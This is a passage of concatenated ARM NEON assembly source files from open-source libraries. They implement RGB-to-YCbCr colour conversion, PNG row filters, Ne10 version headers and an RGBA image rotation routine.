* jsimd_extxbgr_ycc_convert_neon
* jsimd_extxrgb_ycc_convert_neon
*
* Colorspace conversion RGB -> YCbCr
*/
.macro do_store size
.if \size == 8
vst1.8 {d20}, [Y]!
vst1.8 {d21}, [U]!
vst1.8 {d22}, [V]!
.elseif \size == 4
vst1.8 {d20[0]}, [Y]!
vst1.8 {d20[1]}, [Y]!
vst1.8 {d20[2]}, [Y]!
vst1.8 {d20[3]}, [Y]!
vst1.8 {d21[0]}, [U]!
vst1.8 {d21[1]}, [U]!
vst1.8 {d21[2]}, [U]!
vst1.8 {d21[3]}, [U]!
vst1.8 {d22[0]}, [V]!
vst1.8 {d22[1]}, [V]!
vst1.8 {d22[2]}, [V]!
vst1.8 {d22[3]}, [V]!
.elseif \size == 2
vst1.8 {d20[4]}, [Y]!
vst1.8 {d20[5]}, [Y]!
vst1.8 {d21[4]}, [U]!
vst1.8 {d21[5]}, [U]!
vst1.8 {d22[4]}, [V]!
vst1.8 {d22[5]}, [V]!
.elseif \size == 1
vst1.8 {d20[6]}, [Y]!
vst1.8 {d21[6]}, [U]!
vst1.8 {d22[6]}, [V]!
.else
.error unsupported macroblock size
.endif
.endm
.macro do_load bpp, size
.if \bpp == 24
.if \size == 8
vld3.8 {d10, d11, d12}, [RGB]!
pld [RGB, #128]
.elseif \size == 4
vld3.8 {d10[0], d11[0], d12[0]}, [RGB]!
vld3.8 {d10[1], d11[1], d12[1]}, [RGB]!
vld3.8 {d10[2], d11[2], d12[2]}, [RGB]!
vld3.8 {d10[3], d11[3], d12[3]}, [RGB]!
.elseif \size == 2
vld3.8 {d10[4], d11[4], d12[4]}, [RGB]!
vld3.8 {d10[5], d11[5], d12[5]}, [RGB]!
.elseif \size == 1
vld3.8 {d10[6], d11[6], d12[6]}, [RGB]!
.else
.error unsupported macroblock size
.endif
.elseif \bpp == 32
.if \size == 8
vld4.8 {d10, d11, d12, d13}, [RGB]!
pld [RGB, #128]
.elseif \size == 4
vld4.8 {d10[0], d11[0], d12[0], d13[0]}, [RGB]!
vld4.8 {d10[1], d11[1], d12[1], d13[1]}, [RGB]!
vld4.8 {d10[2], d11[2], d12[2], d13[2]}, [RGB]!
vld4.8 {d10[3], d11[3], d12[3], d13[3]}, [RGB]!
.elseif \size == 2
vld4.8 {d10[4], d11[4], d12[4], d13[4]}, [RGB]!
vld4.8 {d10[5], d11[5], d12[5], d13[5]}, [RGB]!
.elseif \size == 1
vld4.8 {d10[6], d11[6], d12[6], d13[6]}, [RGB]!
.else
.error unsupported macroblock size
.endif
.else
.error unsupported bpp
.endif
.endm
.macro generate_jsimd_rgb_ycc_convert_neon colorid, bpp, r_offs, g_offs, b_offs
/*
* 2-stage pipelined RGB->YCbCr conversion
*/
.macro do_rgb_to_yuv_stage1
vmovl.u8 q2, d1\r_offs /* r = { d4, d5 } */
vmovl.u8 q3, d1\g_offs /* g = { d6, d7 } */
vmovl.u8 q4, d1\b_offs /* b = { d8, d9 } */
vmull.u16 q7, d4, d0[0]
vmlal.u16 q7, d6, d0[1]
vmlal.u16 q7, d8, d0[2]
vmull.u16 q8, d5, d0[0]
vmlal.u16 q8, d7, d0[1]
vmlal.u16 q8, d9, d0[2]
vrev64.32 q9, q1
vrev64.32 q13, q1
vmlsl.u16 q9, d4, d0[3]
vmlsl.u16 q9, d6, d1[0]
vmlal.u16 q9, d8, d1[1]
vmlsl.u16 q13, d5, d0[3]
vmlsl.u16 q13, d7, d1[0]
vmlal.u16 q13, d9, d1[1]
vrev64.32 q14, q1
vrev64.32 q15, q1
vmlal.u16 q14, d4, d1[1]
vmlsl.u16 q14, d6, d1[2]
vmlsl.u16 q14, d8, d1[3]
vmlal.u16 q15, d5, d1[1]
vmlsl.u16 q15, d7, d1[2]
vmlsl.u16 q15, d9, d1[3]
.endm
.macro do_rgb_to_yuv_stage2
vrshrn.u32 d20, q7, #16
vrshrn.u32 d21, q8, #16
vshrn.u32 d22, q9, #16
vshrn.u32 d23, q13, #16
vshrn.u32 d24, q14, #16
vshrn.u32 d25, q15, #16
vmovn.u16 d20, q10 /* d20 = y */
vmovn.u16 d21, q11 /* d21 = u */
vmovn.u16 d22, q12 /* d22 = v */
.endm
.macro do_rgb_to_yuv
do_rgb_to_yuv_stage1
do_rgb_to_yuv_stage2
.endm
.macro do_rgb_to_yuv_stage2_store_load_stage1
vrshrn.u32 d20, q7, #16
vrshrn.u32 d21, q8, #16
vshrn.u32 d22, q9, #16
vrev64.32 q9, q1
vshrn.u32 d23, q13, #16
vrev64.32 q13, q1
vshrn.u32 d24, q14, #16
vshrn.u32 d25, q15, #16
do_load \bpp, 8
vmovn.u16 d20, q10 /* d20 = y */
vmovl.u8 q2, d1\r_offs /* r = { d4, d5 } */
vmovn.u16 d21, q11 /* d21 = u */
vmovl.u8 q3, d1\g_offs /* g = { d6, d7 } */
vmovn.u16 d22, q12 /* d22 = v */
vmovl.u8 q4, d1\b_offs /* b = { d8, d9 } */
vmull.u16 q7, d4, d0[0]
vmlal.u16 q7, d6, d0[1]
vmlal.u16 q7, d8, d0[2]
vst1.8 {d20}, [Y]!
vmull.u16 q8, d5, d0[0]
vmlal.u16 q8, d7, d0[1]
vmlal.u16 q8, d9, d0[2]
vmlsl.u16 q9, d4, d0[3]
vmlsl.u16 q9, d6, d1[0]
vmlal.u16 q9, d8, d1[1]
vst1.8 {d21}, [U]!
vmlsl.u16 q13, d5, d0[3]
vmlsl.u16 q13, d7, d1[0]
vmlal.u16 q13, d9, d1[1]
vrev64.32 q14, q1
vrev64.32 q15, q1
vmlal.u16 q14, d4, d1[1]
vmlsl.u16 q14, d6, d1[2]
vmlsl.u16 q14, d8, d1[3]
vst1.8 {d22}, [V]!
vmlal.u16 q15, d5, d1[1]
vmlsl.u16 q15, d7, d1[2]
vmlsl.u16 q15, d9, d1[3]
.endm
.balign 16
jsimd_\colorid\()_ycc_neon_consts:
.short 19595, 38470, 7471, 11059
.short 21709, 32768, 27439, 5329
.short 32767, 128, 32767, 128
.short 32767, 128, 32767, 128
asm_function jsimd_\colorid\()_ycc_convert_neon
OUTPUT_WIDTH .req r0
INPUT_BUF .req r1
OUTPUT_BUF .req r2
OUTPUT_ROW .req r3
NUM_ROWS .req r4
OUTPUT_BUF0 .req r5
OUTPUT_BUF1 .req r6
OUTPUT_BUF2 .req OUTPUT_BUF
RGB .req r7
Y .req r8
U .req r9
V .req r10
N .req ip
/* Load constants to d0, d1, d2, d3 */
adr ip, jsimd_\colorid\()_ycc_neon_consts
vld1.16 {d0, d1, d2, d3}, [ip, :128]
/* Save Arm registers and handle input arguments */
push {r4, r5, r6, r7, r8, r9, r10, lr}
ldr NUM_ROWS, [sp, #(4 * 8)]
ldr OUTPUT_BUF0, [OUTPUT_BUF]
ldr OUTPUT_BUF1, [OUTPUT_BUF, #4]
ldr OUTPUT_BUF2, [OUTPUT_BUF, #8]
.unreq OUTPUT_BUF
/* Save Neon registers */
vpush {d8 - d15}
/* Outer loop over scanlines */
cmp NUM_ROWS, #1
blt 9f
0:
ldr Y, [OUTPUT_BUF0, OUTPUT_ROW, lsl #2]
ldr U, [OUTPUT_BUF1, OUTPUT_ROW, lsl #2]
mov N, OUTPUT_WIDTH
ldr V, [OUTPUT_BUF2, OUTPUT_ROW, lsl #2]
add OUTPUT_ROW, OUTPUT_ROW, #1
ldr RGB, [INPUT_BUF], #4
/* Inner loop over pixels */
subs N, N, #8
blt 3f
do_load \bpp, 8
do_rgb_to_yuv_stage1
subs N, N, #8
blt 2f
1:
do_rgb_to_yuv_stage2_store_load_stage1
subs N, N, #8
bge 1b
2:
do_rgb_to_yuv_stage2
do_store 8
tst N, #7
beq 8f
3:
tst N, #4
beq 3f
do_load \bpp, 4
3:
tst N, #2
beq 4f
do_load \bpp, 2
4:
tst N, #1
beq 5f
do_load \bpp, 1
5:
do_rgb_to_yuv
tst N, #4
beq 6f
do_store 4
6:
tst N, #2
beq 7f
do_store 2
7:
tst N, #1
beq 8f
do_store 1
8:
subs NUM_ROWS, NUM_ROWS, #1
bgt 0b
9:
/* Restore all registers and return */
vpop {d8 - d15}
pop {r4, r5, r6, r7, r8, r9, r10, pc}
.unreq OUTPUT_WIDTH
.unreq OUTPUT_ROW
.unreq INPUT_BUF
.unreq NUM_ROWS
.unreq OUTPUT_BUF0
.unreq OUTPUT_BUF1
.unreq OUTPUT_BUF2
.unreq RGB
.unreq Y
.unreq U
.unreq V
.unreq N
.purgem do_rgb_to_yuv
.purgem do_rgb_to_yuv_stage1
.purgem do_rgb_to_yuv_stage2
.purgem do_rgb_to_yuv_stage2_store_load_stage1
.endm
/*--------------------------------- id ----- bpp R G B */
generate_jsimd_rgb_ycc_convert_neon extrgb, 24, 0, 1, 2
generate_jsimd_rgb_ycc_convert_neon extbgr, 24, 2, 1, 0
generate_jsimd_rgb_ycc_convert_neon extrgbx, 32, 0, 1, 2
generate_jsimd_rgb_ycc_convert_neon extbgrx, 32, 2, 1, 0
generate_jsimd_rgb_ycc_convert_neon extxbgr, 32, 3, 2, 1
generate_jsimd_rgb_ycc_convert_neon extxrgb, 32, 1, 2, 3
.purgem do_load
.purgem do_store
|
open-vela/external_libpng | 8,352 | arm/filter_neon.S |
/* filter_neon.S - NEON optimised filter functions
*
* Copyright (c) 2018 Cosmin Truta
* Copyright (c) 2014,2017 Glenn Randers-Pehrson
* Written by Mans Rullgard, 2011.
*
* This code is released under the libpng license.
* For conditions of distribution and use, see the disclaimer
* and license in png.h
*/
/* This is required to get the symbol renames, which are #defines, and the
* definitions (or not) of PNG_ARM_NEON_OPT and PNG_ARM_NEON_IMPLEMENTATION.
*/
#define PNG_VERSION_INFO_ONLY
#include "../pngpriv.h"
#if (defined(__linux__) || defined(__FreeBSD__)) && defined(__ELF__)
.section .note.GNU-stack,"",%progbits /* mark stack as non-executable */
#endif
#ifdef PNG_READ_SUPPORTED
/* Assembler NEON support - only works for 32-bit ARM (i.e. it does not work for
* ARM64). The code in arm/filter_neon_intrinsics.c supports ARM64, however it
* only works if -mfpu=neon is specified on the GCC command line. See pngpriv.h
* for the logic which sets PNG_USE_ARM_NEON_ASM:
*/
#if PNG_ARM_NEON_IMPLEMENTATION == 2 /* hand-coded assembler */
#if PNG_ARM_NEON_OPT > 0
#ifdef __ELF__
# define ELF
#else
# define ELF @
#endif
.arch armv7-a
.fpu neon
.macro func name, export=0
.macro endfunc
ELF .size \name, . - \name
.endfunc
.purgem endfunc
.endm
.text
/* Explicitly specifying alignment here because some versions of
* GAS don't align code correctly. This is harmless in correctly
* written versions of GAS.
*/
.align 2
.if \export
.global \name
.endif
ELF .type \name, STT_FUNC
.func \name
\name:
.endm
func png_read_filter_row_sub4_neon, export=1
ldr r3, [r0, #4] @ rowbytes
vmov.i8 d3, #0
1:
vld4.32 {d4[],d5[],d6[],d7[]}, [r1,:128]
vadd.u8 d0, d3, d4
vadd.u8 d1, d0, d5
vadd.u8 d2, d1, d6
vadd.u8 d3, d2, d7
vst4.32 {d0[0],d1[0],d2[0],d3[0]},[r1,:128]!
subs r3, r3, #16
bgt 1b
bx lr
endfunc
func png_read_filter_row_sub3_neon, export=1
ldr r3, [r0, #4] @ rowbytes
vmov.i8 d3, #0
mov r0, r1
mov r2, #3
mov r12, #12
vld1.8 {q11}, [r0], r12
1:
vext.8 d5, d22, d23, #3
vadd.u8 d0, d3, d22
vext.8 d6, d22, d23, #6
vadd.u8 d1, d0, d5
vext.8 d7, d23, d23, #1
vld1.8 {q11}, [r0], r12
vst1.32 {d0[0]}, [r1,:32], r2
vadd.u8 d2, d1, d6
vst1.32 {d1[0]}, [r1], r2
vadd.u8 d3, d2, d7
vst1.32 {d2[0]}, [r1], r2
vst1.32 {d3[0]}, [r1], r2
subs r3, r3, #12
bgt 1b
bx lr
endfunc
func png_read_filter_row_up_neon, export=1
ldr r3, [r0, #4] @ rowbytes
1:
vld1.8 {q0}, [r1,:128]
vld1.8 {q1}, [r2,:128]!
vadd.u8 q0, q0, q1
vst1.8 {q0}, [r1,:128]!
subs r3, r3, #16
bgt 1b
bx lr
endfunc
func png_read_filter_row_avg4_neon, export=1
ldr r12, [r0, #4] @ rowbytes
vmov.i8 d3, #0
1:
vld4.32 {d4[],d5[],d6[],d7[]}, [r1,:128]
vld4.32 {d16[],d17[],d18[],d19[]},[r2,:128]!
vhadd.u8 d0, d3, d16
vadd.u8 d0, d0, d4
vhadd.u8 d1, d0, d17
vadd.u8 d1, d1, d5
vhadd.u8 d2, d1, d18
vadd.u8 d2, d2, d6
vhadd.u8 d3, d2, d19
vadd.u8 d3, d3, d7
vst4.32 {d0[0],d1[0],d2[0],d3[0]},[r1,:128]!
subs r12, r12, #16
bgt 1b
bx lr
endfunc
func png_read_filter_row_avg3_neon, export=1
push {r4,lr}
ldr r12, [r0, #4] @ rowbytes
vmov.i8 d3, #0
mov r0, r1
mov r4, #3
mov lr, #12
vld1.8 {q11}, [r0], lr
1:
vld1.8 {q10}, [r2], lr
vext.8 d5, d22, d23, #3
vhadd.u8 d0, d3, d20
vext.8 d17, d20, d21, #3
vadd.u8 d0, d0, d22
vext.8 d6, d22, d23, #6
vhadd.u8 d1, d0, d17
vext.8 d18, d20, d21, #6
vadd.u8 d1, d1, d5
vext.8 d7, d23, d23, #1
vld1.8 {q11}, [r0], lr
vst1.32 {d0[0]}, [r1,:32], r4
vhadd.u8 d2, d1, d18
vst1.32 {d1[0]}, [r1], r4
vext.8 d19, d21, d21, #1
vadd.u8 d2, d2, d6
vhadd.u8 d3, d2, d19
vst1.32 {d2[0]}, [r1], r4
vadd.u8 d3, d3, d7
vst1.32 {d3[0]}, [r1], r4
subs r12, r12, #12
bgt 1b
pop {r4,pc}
endfunc
.macro paeth rx, ra, rb, rc
vaddl.u8 q12, \ra, \rb @ a + b
vaddl.u8 q15, \rc, \rc @ 2*c
vabdl.u8 q13, \rb, \rc @ pa
vabdl.u8 q14, \ra, \rc @ pb
vabd.u16 q15, q12, q15 @ pc
vcle.u16 q12, q13, q14 @ pa <= pb
vcle.u16 q13, q13, q15 @ pa <= pc
vcle.u16 q14, q14, q15 @ pb <= pc
vand q12, q12, q13 @ pa <= pb && pa <= pc
vmovn.u16 d28, q14
vmovn.u16 \rx, q12
vbsl d28, \rb, \rc
vbsl \rx, \ra, d28
.endm
func png_read_filter_row_paeth4_neon, export=1
ldr r12, [r0, #4] @ rowbytes
vmov.i8 d3, #0
vmov.i8 d20, #0
1:
vld4.32 {d4[],d5[],d6[],d7[]}, [r1,:128]
vld4.32 {d16[],d17[],d18[],d19[]},[r2,:128]!
paeth d0, d3, d16, d20
vadd.u8 d0, d0, d4
paeth d1, d0, d17, d16
vadd.u8 d1, d1, d5
paeth d2, d1, d18, d17
vadd.u8 d2, d2, d6
paeth d3, d2, d19, d18
vmov d20, d19
vadd.u8 d3, d3, d7
vst4.32 {d0[0],d1[0],d2[0],d3[0]},[r1,:128]!
subs r12, r12, #16
bgt 1b
bx lr
endfunc
func png_read_filter_row_paeth3_neon, export=1
push {r4,lr}
ldr r12, [r0, #4] @ rowbytes
vmov.i8 d3, #0
vmov.i8 d4, #0
mov r0, r1
mov r4, #3
mov lr, #12
vld1.8 {q11}, [r0], lr
1:
vld1.8 {q10}, [r2], lr
paeth d0, d3, d20, d4
vext.8 d5, d22, d23, #3
vadd.u8 d0, d0, d22
vext.8 d17, d20, d21, #3
paeth d1, d0, d17, d20
vst1.32 {d0[0]}, [r1,:32], r4
vext.8 d6, d22, d23, #6
vadd.u8 d1, d1, d5
vext.8 d18, d20, d21, #6
paeth d2, d1, d18, d17
vext.8 d7, d23, d23, #1
vld1.8 {q11}, [r0], lr
vst1.32 {d1[0]}, [r1], r4
vadd.u8 d2, d2, d6
vext.8 d19, d21, d21, #1
paeth d3, d2, d19, d18
vst1.32 {d2[0]}, [r1], r4
vmov d4, d19
vadd.u8 d3, d3, d7
vst1.32 {d3[0]}, [r1], r4
subs r12, r12, #12
bgt 1b
pop {r4,pc}
endfunc
#endif /* PNG_ARM_NEON_OPT > 0 */
#endif /* PNG_ARM_NEON_IMPLEMENTATION == 2 (assembler) */
#endif /* READ */
|
open-vela/external_Ne10 | 2,035 | common/versionheader.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : common/versionheader.s
@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ version information
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.equ VERSION_MAJOR, 0
.equ VERSION_MINOR, 9
.equ VERSION_REVISION, 10
.equ PHASE, 1
.equ COPYRIGHT_YEAR, 2012
COPYRIGHT_HOLDER:
.asciz "ARM Ltd."
|
open-vela/external_Ne10 | 1,899 | common/NE10header.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : common/NE10header.s
@
.include "versionheader.s"
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ constant values that are used across the library
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
.equ NE10_OK, 0
.equ NE10_ERR, -1
|
open-vela/external_Ne10 | 9,638 | modules/imgproc/NE10_rotate.neon.s | /*
* Copyright 2013-16 ARM Limited and Contributors.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* * Neither the name of ARM Limited nor the
* names of its contributors may be used to endorse or promote products
* derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
* DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
* NE10 Library : imgproc/NE10_rotate.neon.s
*/
#ifdef ENABLE_NE10_IMG_ROTATE_RGBA_NEON
.text
.syntax unified
/**
* @details
* This function implements the image rotation (angle < 90)
*
* @param[out] *dst points to the output pointers
* @param[in] *src points to input pointers
* @param[in] swidth width of input buffer
* @param[in] sheight height of input buffer
* @param[in] dwidth width of output buffer
* @param[in] dheight height of output buffer
* @param[in] *matrix matrix of rotate
*/
.align 4
.global ne10_img_rotate_get_quad_rangle_subpix_rgba_neon
.thumb
.thumb_func
ne10_img_rotate_get_quad_rangle_subpix_rgba_neon:
/*
 * Register-level contract (AAPCS, ARM 32-bit):
 *   r0 = *dst, r1 = *src, r2 = swidth, r3 = sheight;
 *   dwidth, dheight and *matrix are passed on the stack.
 * Each X-loop iteration samples one destination RGBA pixel from a 2x2
 * source neighbourhood (rows pTr0/pTr1), blending with the fractional
 * weights dPosAB/dPosA1 (sub-pixel / bilinear-style sampling), and
 * masks the result to zero when the sample position is out of bounds.
 */
/*ARM Registers*/
/* long-term variable */
pDst .req r0
pSrc .req r1
dstHeight .req r4
srcStep .req r5
dstStep .req r6
countX .req r7
countY .req r8
/* short-term variable */
/* out of loopY -- r2/r3/r9/r10 are re-purposed once the loop starts */
srcWidth .req r2
srcHeight .req r3
dstWidth .req r9
pMatrix .req r10
/* in loopY */
ixs .req r2
iys .req r3
pTr0 .req r9
pTr1 .req r10
/* temp variable */
tmp0 .req r11
tmp1 .req r12
/*NEON Registers*/
/* long-term variable */
dA1 .dn d0
dA2 .dn d1
dA3 .dn d2
dY .dn d3
dDW .dn d4
dSrcSizeSub1 .dn d5
dSrcSizeSub4 .dn d6
dValOne .dn d7
dValOneF .dn d23
/* short-term variable */
/* out of loopY */
dValFour .dn d16
dSrcSize .dn d17
/* in loopY */
/* temp variable -- note several aliases share physical registers
 * (e.g. dBitIS/dOutFlag are both d19, qP0 reuses q13); lifetimes do
 * not overlap, but keep that in mind before reordering instructions. */
qBitSE .qn q8
dBitS .dn d16
dBitE .dn d17
dBitSE .dn d18
dBitIS .dn d19
dOutFlag .dn d19
dPosS .dn d20
dPosE .dn d21
dPosIS .dn d22
dPosAB .dn d8
dPosA1 .dn d9
dIn0_01234567 .dn d26
qIn0_01234567 .qn q13
dIn0_0123 .dn d26
dIn0_4567 .dn d27
dIn1_01234567 .dn d28
qIn1_01234567 .qn q14
dIn1_0123 .dn d28
dIn1_4567 .dn d29
qIn0_0123 .qn q15
qIn0_4567 .qn q5
qIn1_0123 .qn q6
qIn1_4567 .qn q7
qP0 .qn q13
qP1 .qn q14
qOut_0123 .qn q5
dOut_0123 .dn d10
dOut_hw .dn d11
dPosISF .dn d30
qTmp0 .qn q15
dTmp0 .dn d30
dTmp1 .dn d31
push {r4-r12, lr}
vpush {d8-d15}
/* load parameters from sp:
 * 10 GPRs (40 bytes) + d8-d15 (64 bytes) were just saved, so the
 * first stack argument now lives at [sp, #104]. */
ldr dstWidth, [sp, #104]
ldr dstHeight, [sp, #108]
ldr pMatrix, [sp, #112]
lsl srcStep, srcWidth, #2
lsl dstStep, dstWidth, #2
vld3.f32 {dA1, dA2, dA3}, [pMatrix]
/* set number of loop y */
mov countY, dstHeight
/* set NEON register for 1 and 4*/
mov tmp0, #1
vdup.32 dValOne, tmp0
vcvt.f32.u32 dValOneF, dValOne
vshl.s32 dValFour, dValOne, #2
vmov dSrcSize, srcWidth, srcHeight
vsub.i32 dSrcSizeSub4, dSrcSize, dValFour
vsub.i32 dSrcSizeSub1, dSrcSize, dValOne
/* loop y start */
/* NOTE(review): the dstHeight==0 early-out below is commented out, so
 * the Y loop body always runs at least once -- confirm callers never
 * pass dheight == 0. */
@cbz countY, GetQuadrangleSubPixEnd
sub tmp1, dstWidth, #1
vdup.32 dDW, tmp1
vcvt.f32.u32 dDW, dDW
vmul.f32 dDW, dA1, dDW
GetQuadrangleSubPixLoopY:
sub tmp0, dstHeight, countY
vdup.32 dY, tmp0
vcvt.f32.u32 dY, dY
/* calculate xs, ys, xe, ye: start/end sample positions of this row,
 * then build a per-row in-bounds mask (dBitSE) from them */
vmov.f32 dPosS, dA3
vmla.f32 dPosS, dA2, dY
vadd.f32 dPosE, dDW, dPosS
vcvt.s32.f32 dPosIS, dPosS
vcvt.s32.f32 dPosE, dPosE
vsub.s32 dBitS, dPosIS, dValOne
vsub.s32 dPosE, dPosE, dValOne
vcgt.u32 dBitS, dSrcSizeSub4, dBitS
vcgt.u32 dBitE, dSrcSizeSub4, dPosE
vrev64.32 dTmp0, dBitS
vrev64.32 dTmp1, dBitE
vand.32 dBitS, dBitS, dTmp0
vand.32 dBitE, dBitE, dTmp1
vand.32 dBitSE, dBitE, dBitS
/* set number of loop x (dstStep/4 == dstWidth pixels) */
lsr countX, dstStep, #2
GetQuadrangleSubPixLoopX:
vcvt.s32.f32 dPosIS, dPosS
vcvt.f32.s32 dPosISF, dPosIS
vsub.f32 dPosAB, dPosS, dPosISF
vsub.f32 dPosA1, dValOneF, dPosAB
vcgt.u32 dBitIS, dSrcSizeSub1, dPosIS
vrev64.32 dTmp0, dBitIS
vand.32 dBitIS, dBitIS, dTmp0
vadd.f32 dPosS, dPosS, dA1
vorr dOutFlag, dBitIS, dBitSE
/* to avoid that ixs/iys is negative. this will result in bad address of pTr0/pTr1 */
vabs.s32 dPosIS, dPosIS
vmov ixs, iys, dPosIS
lsl ixs, ixs, #2
mla tmp0, srcStep, iys, ixs
add pTr0, pSrc, tmp0
add pTr1, pTr0, srcStep
/* load two adjacent RGBA pixel pairs from two consecutive source rows */
vld1.8 {dIn0_01234567}, [pTr0]
vld1.8 {dIn1_01234567}, [pTr1]
vmovl.u8 qIn0_01234567, dIn0_01234567
vmovl.u8 qIn1_01234567, dIn1_01234567
vmovl.u16 qIn0_0123, dIn0_0123
vmovl.u16 qIn1_0123, dIn1_0123
vmovl.u16 qIn0_4567, dIn0_4567
vmovl.u16 qIn1_4567, dIn1_4567
vcvt.f32.u32 qIn0_0123, qIn0_0123
vcvt.f32.u32 qIn1_0123, qIn1_0123
vcvt.f32.u32 qIn0_4567, qIn0_4567
vcvt.f32.u32 qIn1_4567, qIn1_4567
/* horizontal blend within each row, then vertical blend between rows */
vmul.f32 qP0, qIn0_0123, dPosA1[0]
vmul.f32 qP1, qIn1_0123, dPosA1[0]
vmla.f32 qP0, qIn0_4567, dPosAB[0]
vmla.f32 qP1, qIn1_4567, dPosAB[0]
vsub.f32 qTmp0, qP1, qP0
vmla.f32 qP0, qTmp0, dPosAB[1]
vcvt.u32.f32 qOut_0123, qP0
vmovn.u32 dOut_0123, qOut_0123
/* zero the result with the bounds mask built above, then narrow to
 * bytes; only lane 0 (one 4-byte RGBA pixel) is stored */
vand.u32 dOut_0123, dOut_0123, dOutFlag
vmovn.u16 dOut_0123, qOut_0123
vst1.32 {dOut_0123[0]}, [pDst]!
subs countX, countX, #1
bgt GetQuadrangleSubPixLoopX
subs countY, countY, #1
bgt GetQuadrangleSubPixLoopY
GetQuadrangleSubPixEnd:
/*Return From Function*/
vpop {d8-d15}
pop {r4-r12, pc}
.end
#endif // ENABLE_NE10_IMG_ROTATE_RGBA_NEON
|
open-vela/external_Ne10 | 3,210 | modules/math/NE10_mul.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
